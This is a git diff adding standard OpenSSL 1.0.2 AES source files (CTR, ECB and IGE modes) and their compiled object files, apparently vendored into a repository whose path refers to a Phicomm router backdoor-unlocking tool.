ze!SrIxahC1bA`wC&zoF$Tz`CT79Q81>h}we>n|lc{dxNPdG-6RQFvVcz7h+M>(7U$
zg~#>p*Is|V|K7j;eK{2#*T4S8g~#=;Ke_O@{`IE|2)X^<fBr)QJN>;F7k>q}Zu*6S
z@q+7jVxjSZ>o>m8c)|5+;5a&bcxXUB?n6WJ?*|nug#--?a10F^7i!?xKOi)~z_H)x
z(FTqo!TApYgNF|f8o{~|!J$Epe5ckO9U2fgRR4J3h%m>IA;BYqLPEpYM(inQkpF;?
zfZ;*<SMq<mvtx5{sP!M$@142omy-3LPr(ZP$5QZ6_v1=&D!Kk1$zK>J&%aO6AMBz$
z6x$YjOWNeGHmI&2*Iyp`Q3Hcw;(w_7ms{cIcVLd#=l^zlXSNml{QEh<Ljybg^Sf3S
zkN&#Z{k5oDYRbQ2d#6I<ee2~9)G0Jx@cIkx-B@3+{P(FE{q}z!6U&9?c4AC?+ZBHO
z^Yq)>vF`7;g5zH>HiQMS&%)d9EqMMyPgr<+aTfmD=daTL;<hjA#Z7$v;?gbHzTor!
zx91k~_v#O*tNw+F%UbwYczdzW!k;}u2HEw+zx;1o`FFqnE%bH_1WW(6eXRcVhyLC&
Jf1&X9{{dM+wm<*?

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ctr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ctr.c
new file mode 100644
index 0000000..3ee3822
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ctr.c
@@ -0,0 +1,63 @@
+/* crypto/aes/aes_ctr.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/aes.h>
+#include <openssl/modes.h>
+
+void AES_ctr128_encrypt(const unsigned char *in, unsigned char *out,
+                        size_t length, const AES_KEY *key,
+                        unsigned char ivec[AES_BLOCK_SIZE],
+                        unsigned char ecount_buf[AES_BLOCK_SIZE],
+                        unsigned int *num)
+{
+    CRYPTO_ctr128_encrypt(in, out, length, key, ivec, ecount_buf, num,
+                          (block128_f) AES_encrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ctr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ctr.o
new file mode 100644
index 0000000000000000000000000000000000000000..1d9b19d5dd64cd9a0a6f64a80fd3228d274c8586
GIT binary patch
literal 1640
zcmbtTy>1gh5T45g62KS-Q5Xe9S0EGwS=k{7lLFZ>X9KculsHH!(CKWBL?Zst-CBw%
zpn!ssN1)^pD3RbnC}|NLLNYUZJI;AIH!#xNeDm$h&g|^oYqwFGvn*h-;2xZK%mS?1
zC%CL&8O}oneqLDlwLQK~%vfH{e<$$Z&DZ=Fs8_3-&gx!!*pox&uDB%%YsEW5<rZJ9
z7ery>dQ4La%%kQ|PodTy@4+0vXX3c*CB!7w%N?+ebJlWZVevgSdIdRBlFRgQv$<L}
ze?RLy%r25YL+Fh2@MD~|Y^P3udf{%SvuxG<G)JBdr~f7uzc7PO@7PvTnNB%}?!`o(
z>g>p^pwb*o*+3$VFVEn?4<fH4L(zeXyGy9JUh;xoCmanVc=bketJ3hAwc4)R@>-Rx
zhU=+7j;QYJZ?~Fe9sr;G4A!MH{2s@`z0sX#61;<$1mA;F<<Lh&qptMZXk{4NLq=h6
z<O>-bOAya|>4RuT5r|H|+YNfi_4+ap_{P>E>33de|DZP%gRnmcLOBAVb_fo==b_&X
zCMEv|IG9Xt&U_JN<Vg7bVlR$mOm-QSW>ZE@%76xgQiu(lMN4(~CFM1LP4ngp-q-7<
zp*@mv6CK*~U-OHYOM7yk2$gXC8%$`+_1SJB&o~+SHt8g=8T$y==<VroO(NfE<V=_t
z@cfu=BcMIa{Es@I#DUtH`A?BgyT1>5L%t`vKg#8N=F@6Zsc-Z_Dd_{#KSlqRnNOT~
dcSu2A*MCAzLd^Ls;aXb$C!K$k$R%jz{{jE(dw~D|

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ecb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ecb.c
new file mode 100644
index 0000000..2e0d20c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ecb.c
@@ -0,0 +1,73 @@
+/* crypto/aes/aes_ecb.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#ifndef AES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+#include <openssl/aes.h>
+#include "aes_locl.h"
+
+void AES_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                     const AES_KEY *key, const int enc)
+{
+
+    assert(in && out && key);
+    assert((AES_ENCRYPT == enc) || (AES_DECRYPT == enc));
+
+    if (AES_ENCRYPT == enc)
+        AES_encrypt(in, out, key);
+    else
+        AES_decrypt(in, out, key);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ecb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ecb.o
new file mode 100644
index 0000000000000000000000000000000000000000..13a3ca54d83d9e307f22127864e0d774dec4b27c
GIT binary patch
literal 1616
zcmbtTUuzRV5T9#W8#UTk`XE%~o<z|ui3)0=lC&g22^RVXe39esx>~Tggu6Xx3R)k1
z^dt16`0ATq!$<K=ggCRe)4Qw}A9P@MW_~;Wc4zjq)9=nX4lp_J6mpGGfO;jDTUu<v
z6{x|FrJFw|U($tdgy{`>TU+by?foE)RO&tv4@6_F`6$(D^ZosXXgs`=!Q?WJtBz{{
zSMS9>%mI8RjMJ^4Oyr#GfOA}TR%?sZPgo$~H}na>vf+PYbf<avJ}I-Ql-`(X;3}rQ
zD!S@vjI;_|_!HFl;taex1E<%Rrpu@<7wY6YuOd$GXHye_GJInO4!%r083rPRc4wC)
zPex%p9x3p8{q4<m-`nnXcRPFDUVF3O@iHr8K^_M(vo?iXG@N=#wf~xAbhUuj3b<=<
z>_5#wP9hl(lpladRGjfcmSTD23nh;ghy!2wAc7<T5e^3f86g%8l@vHrYl-s1w?=;x
zrD7BhM>1Ap5ITZ9^j^pQK;}9BLvqoVX3d_27Ggx)w@k}yStd^Xq&I8fD$+~yC=CN%
zLQZ*jg036<mci}G-7)7jqZmcHhYH2~SAUv2iph1NsEPC6Wx#OG&wL$mmW!tEib_GY
zZJ*;A{kEwYLj40SB3JME#_z{SfC9y|{m+bneJ|Vp721{c@1qIGeWL!6FZ(lImYY(4
tr48w^xiI}H`eU{~VRr8jf~v{?jFbYIaOcQ1l*;_ijQ`QOWhU7EzX7uha#jEU

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ige.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ige.c
new file mode 100644
index 0000000..cf31c9b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ige.c
@@ -0,0 +1,323 @@
+/* crypto/aes/aes_ige.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include "cryptlib.h"
+
+#include <openssl/aes.h>
+#include "aes_locl.h"
+
+#define N_WORDS (AES_BLOCK_SIZE / sizeof(unsigned long))
+typedef struct {
+    unsigned long data[N_WORDS];
+} aes_block_t;
+
+/* XXX: probably some better way to do this */
+#if defined(__i386__) || defined(__x86_64__)
+# define UNALIGNED_MEMOPS_ARE_FAST 1
+#else
+# define UNALIGNED_MEMOPS_ARE_FAST 0
+#endif
+
+#if UNALIGNED_MEMOPS_ARE_FAST
+# define load_block(d, s)        (d) = *(const aes_block_t *)(s)
+# define store_block(d, s)       *(aes_block_t *)(d) = (s)
+#else
+# define load_block(d, s)        memcpy((d).data, (s), AES_BLOCK_SIZE)
+# define store_block(d, s)       memcpy((d), (s).data, AES_BLOCK_SIZE)
+#endif
+
+/* N.B. The IV for this mode is _twice_ the block size */
+
+void AES_ige_encrypt(const unsigned char *in, unsigned char *out,
+                     size_t length, const AES_KEY *key,
+                     unsigned char *ivec, const int enc)
+{
+    size_t n;
+    size_t len = length;
+
+    OPENSSL_assert(in && out && key && ivec);
+    OPENSSL_assert((AES_ENCRYPT == enc) || (AES_DECRYPT == enc));
+    OPENSSL_assert((length % AES_BLOCK_SIZE) == 0);
+
+    len = length / AES_BLOCK_SIZE;
+
+    if (AES_ENCRYPT == enc) {
+        if (in != out &&
+            (UNALIGNED_MEMOPS_ARE_FAST
+             || ((size_t)in | (size_t)out | (size_t)ivec) % sizeof(long) ==
+             0)) {
+            aes_block_t *ivp = (aes_block_t *) ivec;
+            aes_block_t *iv2p = (aes_block_t *) (ivec + AES_BLOCK_SIZE);
+
+            while (len) {
+                aes_block_t *inp = (aes_block_t *) in;
+                aes_block_t *outp = (aes_block_t *) out;
+
+                for (n = 0; n < N_WORDS; ++n)
+                    outp->data[n] = inp->data[n] ^ ivp->data[n];
+                AES_encrypt((unsigned char *)outp->data,
+                            (unsigned char *)outp->data, key);
+                for (n = 0; n < N_WORDS; ++n)
+                    outp->data[n] ^= iv2p->data[n];
+                ivp = outp;
+                iv2p = inp;
+                --len;
+                in += AES_BLOCK_SIZE;
+                out += AES_BLOCK_SIZE;
+            }
+            memcpy(ivec, ivp->data, AES_BLOCK_SIZE);
+            memcpy(ivec + AES_BLOCK_SIZE, iv2p->data, AES_BLOCK_SIZE);
+        } else {
+            aes_block_t tmp, tmp2;
+            aes_block_t iv;
+            aes_block_t iv2;
+
+            load_block(iv, ivec);
+            load_block(iv2, ivec + AES_BLOCK_SIZE);
+
+            while (len) {
+                load_block(tmp, in);
+                for (n = 0; n < N_WORDS; ++n)
+                    tmp2.data[n] = tmp.data[n] ^ iv.data[n];
+                AES_encrypt((unsigned char *)tmp2.data,
+                            (unsigned char *)tmp2.data, key);
+                for (n = 0; n < N_WORDS; ++n)
+                    tmp2.data[n] ^= iv2.data[n];
+                store_block(out, tmp2);
+                iv = tmp2;
+                iv2 = tmp;
+                --len;
+                in += AES_BLOCK_SIZE;
+                out += AES_BLOCK_SIZE;
+            }
+            memcpy(ivec, iv.data, AES_BLOCK_SIZE);
+            memcpy(ivec + AES_BLOCK_SIZE, iv2.data, AES_BLOCK_SIZE);
+        }
+    } else {
+        if (in != out &&
+            (UNALIGNED_MEMOPS_ARE_FAST
+             || ((size_t)in | (size_t)out | (size_t)ivec) % sizeof(long) ==
+             0)) {
+            aes_block_t *ivp = (aes_block_t *) ivec;
+            aes_block_t *iv2p = (aes_block_t *) (ivec + AES_BLOCK_SIZE);
+
+            while (len) {
+                aes_block_t tmp;
+                aes_block_t *inp = (aes_block_t *) in;
+                aes_block_t *outp = (aes_block_t *) out;
+
+                for (n = 0; n < N_WORDS; ++n)
+                    tmp.data[n] = inp->data[n] ^ iv2p->data[n];
+                AES_decrypt((unsigned char *)tmp.data,
+                            (unsigned char *)outp->data, key);
+                for (n = 0; n < N_WORDS; ++n)
+                    outp->data[n] ^= ivp->data[n];
+                ivp = inp;
+                iv2p = outp;
+                --len;
+                in += AES_BLOCK_SIZE;
+                out += AES_BLOCK_SIZE;
+            }
+            memcpy(ivec, ivp->data, AES_BLOCK_SIZE);
+            memcpy(ivec + AES_BLOCK_SIZE, iv2p->data, AES_BLOCK_SIZE);
+        } else {
+            aes_block_t tmp, tmp2;
+            aes_block_t iv;
+            aes_block_t iv2;
+
+            load_block(iv, ivec);
+            load_block(iv2, ivec + AES_BLOCK_SIZE);
+
+            while (len) {
+                load_block(tmp, in);
+                tmp2 = tmp;
+                for (n = 0; n < N_WORDS; ++n)
+                    tmp.data[n] ^= iv2.data[n];
+                AES_decrypt((unsigned char *)tmp.data,
+                            (unsigned char *)tmp.data, key);
+                for (n = 0; n < N_WORDS; ++n)
+                    tmp.data[n] ^= iv.data[n];
+                store_block(out, tmp);
+                iv = tmp2;
+                iv2 = tmp;
+                --len;
+                in += AES_BLOCK_SIZE;
+                out += AES_BLOCK_SIZE;
+            }
+            memcpy(ivec, iv.data, AES_BLOCK_SIZE);
+            memcpy(ivec + AES_BLOCK_SIZE, iv2.data, AES_BLOCK_SIZE);
+        }
+    }
+}
+
+/*
+ * Note that its effectively impossible to do biIGE in anything other
+ * than a single pass, so no provision is made for chaining.
+ */
+
+/* N.B. The IV for this mode is _four times_ the block size */
+
+void AES_bi_ige_encrypt(const unsigned char *in, unsigned char *out,
+                        size_t length, const AES_KEY *key,
+                        const AES_KEY *key2, const unsigned char *ivec,
+                        const int enc)
+{
+    size_t n;
+    size_t len = length;
+    unsigned char tmp[AES_BLOCK_SIZE];
+    unsigned char tmp2[AES_BLOCK_SIZE];
+    unsigned char tmp3[AES_BLOCK_SIZE];
+    unsigned char prev[AES_BLOCK_SIZE];
+    const unsigned char *iv;
+    const unsigned char *iv2;
+
+    OPENSSL_assert(in && out && key && ivec);
+    OPENSSL_assert((AES_ENCRYPT == enc) || (AES_DECRYPT == enc));
+    OPENSSL_assert((length % AES_BLOCK_SIZE) == 0);
+
+    if (AES_ENCRYPT == enc) {
+        /*
+         * XXX: Do a separate case for when in != out (strictly should check
+         * for overlap, too)
+         */
+
+        /* First the forward pass */
+        iv = ivec;
+        iv2 = ivec + AES_BLOCK_SIZE;
+        while (len >= AES_BLOCK_SIZE) {
+            for (n = 0; n < AES_BLOCK_SIZE; ++n)
+                out[n] = in[n] ^ iv[n];
+            AES_encrypt(out, out, key);
+            for (n = 0; n < AES_BLOCK_SIZE; ++n)
+                out[n] ^= iv2[n];
+            iv = out;
+            memcpy(prev, in, AES_BLOCK_SIZE);
+            iv2 = prev;
+            len -= AES_BLOCK_SIZE;
+            in += AES_BLOCK_SIZE;
+            out += AES_BLOCK_SIZE;
+        }
+
+        /* And now backwards */
+        iv = ivec + AES_BLOCK_SIZE * 2;
+        iv2 = ivec + AES_BLOCK_SIZE * 3;
+        len = length;
+        while (len >= AES_BLOCK_SIZE) {
+            out -= AES_BLOCK_SIZE;
+            /*
+             * XXX: reduce copies by alternating between buffers
+             */
+            memcpy(tmp, out, AES_BLOCK_SIZE);
+            for (n = 0; n < AES_BLOCK_SIZE; ++n)
+                out[n] ^= iv[n];
+            /*
+             * hexdump(stdout, "out ^ iv", out, AES_BLOCK_SIZE);
+             */
+            AES_encrypt(out, out, key);
+            /*
+             * hexdump(stdout,"enc", out, AES_BLOCK_SIZE);
+             */
+            /*
+             * hexdump(stdout,"iv2", iv2, AES_BLOCK_SIZE);
+             */
+            for (n = 0; n < AES_BLOCK_SIZE; ++n)
+                out[n] ^= iv2[n];
+            /*
+             * hexdump(stdout,"out", out, AES_BLOCK_SIZE);
+             */
+            iv = out;
+            memcpy(prev, tmp, AES_BLOCK_SIZE);
+            iv2 = prev;
+            len -= AES_BLOCK_SIZE;
+        }
+    } else {
+        /* First backwards */
+        iv = ivec + AES_BLOCK_SIZE * 2;
+        iv2 = ivec + AES_BLOCK_SIZE * 3;
+        in += length;
+        out += length;
+        while (len >= AES_BLOCK_SIZE) {
+            in -= AES_BLOCK_SIZE;
+            out -= AES_BLOCK_SIZE;
+            memcpy(tmp, in, AES_BLOCK_SIZE);
+            memcpy(tmp2, in, AES_BLOCK_SIZE);
+            for (n = 0; n < AES_BLOCK_SIZE; ++n)
+                tmp[n] ^= iv2[n];
+            AES_decrypt(tmp, out, key);
+            for (n = 0; n < AES_BLOCK_SIZE; ++n)
+                out[n] ^= iv[n];
+            memcpy(tmp3, tmp2, AES_BLOCK_SIZE);
+            iv = tmp3;
+            iv2 = out;
+            len -= AES_BLOCK_SIZE;
+        }
+
+        /* And now forwards */
+        iv = ivec;
+        iv2 = ivec + AES_BLOCK_SIZE;
+        len = length;
+        while (len >= AES_BLOCK_SIZE) {
+            memcpy(tmp, out, AES_BLOCK_SIZE);
+            memcpy(tmp2, out, AES_BLOCK_SIZE);
+            for (n = 0; n < AES_BLOCK_SIZE; ++n)
+                tmp[n] ^= iv2[n];
+            AES_decrypt(tmp, out, key);
+            for (n = 0; n < AES_BLOCK_SIZE; ++n)
+                out[n] ^= iv[n];
+            memcpy(tmp3, tmp2, AES_BLOCK_SIZE);
+            iv = tmp3;
+            iv2 = out;
+            len -= AES_BLOCK_SIZE;
+            in += AES_BLOCK_SIZE;
+            out += AES_BLOCK_SIZE;
+        }
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ige.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ige.o
new file mode 100644
index 0000000000000000000000000000000000000000..e689aedb0698a7231b73f96c85f05d776130504e
GIT binary patch
literal 4416
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_locl.h
new file mode 100644
index 0000000..fabfd02
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_locl.h
@@ -0,0 +1,89 @@
+/* crypto/aes/aes.h -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
